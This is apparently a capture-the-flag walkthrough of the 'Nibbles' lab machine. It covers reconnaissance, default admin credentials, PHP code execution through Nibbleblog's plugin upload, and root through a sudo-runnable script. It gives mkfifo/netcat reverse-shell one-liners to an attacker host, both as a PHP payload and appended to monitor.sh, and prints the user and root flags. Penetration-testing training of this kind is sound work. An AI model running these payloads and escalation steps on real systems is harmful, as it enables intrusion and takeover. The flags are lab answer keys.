# User Flag
![[nibbles_card.webp]]
## Recon:
### Nmap
The first scan we always perform is an [[Nmap|Nmap]] scan, it shows us available services running, and can even let us in on vulnerable services running on our target. In this case we're going to be running `nmap` with the following flags:
- `-sV` for [[Nmap#Service Detection|Service Detection]]
- `-sC` for basic [[Nmap#Script Scanning|Script Scanning]]
```shell
# Nmap 7.94SVN scan initiated Mon Oct 21 18:12:48 2024 as: /usr/lib/nmap/nmap --privileged -sV -sC -oN nmap/nmap-apache 10.129.119.36
Nmap scan report for 10.129.119.36
Host is up (0.049s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 18:12:57 2024 -- 1 IP address (1 host up) scanned in 9.16 seconds
```
#### Services to Investigate:
- Port `80 HTTP`
### whatweb
Knowing that this box is running a webserver, we should begin by investigating the webserver `OS`, type and version using [[whatweb]]:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ whatweb 10.129.8.89
http://10.129.8.89 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.8.89]
```
### curl
The next thing we can do is `curl` the contents of the home page. Of course we can also visit the site in our web browser if we like:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ curl 10.129.8.89
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
```
The `nibbleblog` directory may be interesting, let's use `gobuster` on that directory and see what we get.
### gobuster
[[gobuster|gobuster]] allows us to explore directories in the webserver, which correlate to file paths we can investigate in the browser. Running `gobuster` is a guessing game, because our results rely completely on the `wordlist` chosen.
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ gobuster dir -u http://10.129.8.89/nibbleblog --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt -o gobusterSecListNibbleBlog
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.8.89/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 306]
/.hta (Status: 403) [Size: 301]
/.htaccess (Status: 403) [Size: 306]
/README (Status: 200) [Size: 4628]
/admin (Status: 301) [Size: 321] [--> http://10.129.8.89/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/content (Status: 301) [Size: 323] [--> http://10.129.8.89/nibbleblog/content/]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 325] [--> http://10.129.8.89/nibbleblog/languages/]
/plugins (Status: 301) [Size: 323] [--> http://10.129.8.89/nibbleblog/plugins/]
/themes (Status: 301) [Size: 322] [--> http://10.129.8.89/nibbleblog/themes/]
```
#### Directories to Investigate:
- `/admin.php`, likely an admin login page
- `/README` may have some useful info, or forgotten credentials
- `/admin` requires login permissions, but it does exist and we could take advantage of it
### Visit README file
`http://nibbles.com/nibbleblog/README` to retrieve some info on the site:
```shell
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content†writable by Apache/PHP
Optionals requirements
* PHP module - Mcrypt
===== Installation guide =====
1- Download the last version from http://nibbleblog.com
2- Unzip the downloaded file
3- Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
4- With your browser, go to the URL of your web. Example: www.domain-name.com
5- Complete the form
6- Done! you have installed Nibbleblog
===== About the author =====
Name: Diego Najar
E-mail:
[email protected]
Linkedin: http://www.linkedin.com/in/dignajar
```
As a result of investigating this file, we see that it is probably running PHP version `4.0.3`, which may be vulnerable. However, we still need to gather some information on the target. To do that, we can visit some of the sites listed by out [[Nibbles#gobuster|gobuster enumeration]].
### Visit /nibbleblog/content
When checking `/nibbleblog/content` we find a few directories:
- `Private`
- `Public`
- `Tmp`
The private directory is open and there are a lot of `xml` files in it. One file is labeled `users.xml`. Looking into it shows us that the administrator is named `admin`. In fact, there seems to be a blacklisted IP address: `10.10.10.1`.
## Credentials:
| Username | Password |
| -------- | -------- |
| admin | nibbles |
| nibbler | |
## Initial Foothold:
Now that we have a username and password for the admin user of `nibbleblog`, we can login and begin poking around.
![[nibbleblog admin page.png]]
There are a few different pages to look into, but the most interesting appears to be the `Plugins` page.
![[nibbleblog plugin page.png]]
It appears that we can upload our own plugins via the `Plugins Available for Install` section.
![[nibbleblog plugins available for install.png]]
Next, we can test if `php` code can be uploaded:
```php
<?php system('id'); ?>
```
We got some errors when we ran that, but let's check out the directories again to see if that file went somewhere. We're going to visit `/nibbleblog/content/private/plugins/about`.
![[nibbleblog php test.png|500]]
It looks like the **Last Modified** section shows that these files were edited just now, which implies that they changed as a result of us uploading that file.
Checking `profile_picture.php` shows us the following:
```shell
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
```
This is the result of our `php` test script uploaded earlier. It prints out the system ID, and we see a result that not only can we execute code, we also know what permissions we have on the server. Additionally, we know that the username is `nibbler`.
### Reverse Shell
Next, we can upload a `php` script that will serve as a `reverse shell` for us. We're going to start with a `Bash` script and stick it inside our `php` script
![[Reverse Shells#Bash]]
#### PHP
```php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKING IP LISTEN PORT >/tmp/f"); ?>
```
Next, we create a file just like before and upload our payload to the `plugin` page. At the same time, we start a `netcat` listener on our attacking machine.
#### Netcat
```shell
nc -lvnp 9443
```
We know we have a successful connection when we see the following:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/Getting-Started/12.Nibbles]
└─$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.15.64] from (UNKNOWN) [10.129.238.242] 46266
/bin/sh: 0: can't access tty; job control turned off
$
```
We can improve the quality of our shell with `nibbles` by running the following command:
![[Reverse Shells#Python 3]]
Now that we have a stable shell, we can begin exploring the filesystem. We are immediately placed in the following directory:
```shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/about$ whoami
```
Since this is `/var/www/html` we know this is the directory of the webserver, which makes a lot of sense since that was our entry point. Fortunately we can easily navigate to the root directory.
From there its quite easy to navigate up the home directory for `nibbler`, where we see the `user.txt` flag.
## Flag:
`79c03865431abf47b90ef24b9695e148`
# Root Flag
## Investigate personal.zip:
In the `nibbler` home directory, there is a zip file named `personal.zip`. We can unzip this and see what's inside using `unzip`:
```shell
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
```
When we run `cat monitor.sh` we see the following:
```shell
############################################################################
# Tecmint_monitor.sh
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health- # monitoring-script/
# If any bug, report us in the link below #
# Free to use/edit/distribute the code below by #
# giving proper credit to Tecmint.com and Author #
# #
############################################################################
```
It appears that this is the name of the monitoring program being used for the webserver.
### Look for privilege escalation vectors:
Looks like the program `monitor.sh` can be run as the root user. Since we can modify this file, we can add something in that will run with root privileges.
```shell
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
### Craft a Reverse Shell:
To take advantage of this vulnerability, we're going to append a reverse shell to the end of `monitor.sh` so that our reverse shell runs with root privileges.
>[!tip] Notice that we are using a different port number than our current reverse shell. This is necessary to prevent loss of connection.
```shell
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.64 8443 >/tmp/f' | tee -a monitor.sh
```
Before we start this program, we should start another [[Reverse Shells#Netcat Listener|reverse shell listener]] in a terminal tab:
```shell
nc -lnvp 8443
```
Back in our user reverse shell tab, we can run the updated `monitor.sh` program using root permission like so:
```shell
sudo ./monitor.sh
```
We should see a shell open up:
```shell
┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.15.64] from (UNKNOWN) [10.129.199.145] 43652
#
```
As usual, we want to stabilize the shell:
![[Reverse Shells#Python 3]]
From here we simply navigate to the root directory to find our flag `root.txt`
## Root Flag:
`de5e5d6619862a8aa5b9b212314e0cdd`